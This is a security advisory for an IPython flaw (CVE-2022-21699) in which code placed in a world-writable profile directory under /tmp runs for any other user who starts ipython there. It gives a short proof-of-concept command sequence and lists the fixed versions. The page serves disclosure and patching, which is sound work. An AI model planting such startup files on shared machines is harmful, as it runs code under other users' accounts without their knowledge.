Skip to content
IPythonGHSA-pq7m-3gw7-gq5x

Execution with Unnecessary Privileges in ipython

High8.2CVE-2022-21699 · Published Jan 21, 2022 · updated Sep 10, 2026

We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another. Proof of concept User1: ``` mkdir -m 777 /tmp/profile_default mkdir -m 777 /tmp/profile_default/startup echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/foo.py ``` User2: ``` cd /tmp ipython ``` User2 will see: ``` Python 3.9.7 (default, Oct 25 2021, 01:04:21) Type 'copyright', 'credits' or 'license' for more information IPython 7.29.0 -- An enhanced Interactive Python. Type '?' for help. stealing your private secrets ``` ## Patched release and documentation See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699, Version 8.0.1, 7.31.1 for current Python version are recommended. Version 7.16.3 has also been published for Python 3.6 users, Version 5.11 (source only, 5.x branch on github) for older Python versions.

GitHub advisory

Affected versions

PackageAffectedFixed in
ipython
PyPI
< 5.115.11
>= 6.0.0, < 7.16.37.16.3
>= 7.17.0, < 7.31.17.31.1
>= 8.0.0, < 8.0.18.0.1
Details and references

More IPython advisories

All IPython
Advisory
IPython vulnerable to command injection via set_term_title
Low4.5Feb 10, 2023
Improper Neutralization of Input During Web Page Generation in IPython
Medium6.1May 17, 2022
IPython vulnerable to cross site request forgery (CSRF)
High8.8May 17, 2022
IPython Notebook vulnerable to improper validation of the origin of websocket requests
High9.8May 14, 2022
Improper Neutralization of Input During Web Page Generation in IPython
Medium6.1May 13, 2022

Critical advisories by email

Wednesdays: the week’s critical and high advisories in the AI and data stack, with the fixed versions. Only in weeks that have some.

Double opt-in. Unsubscribe any time.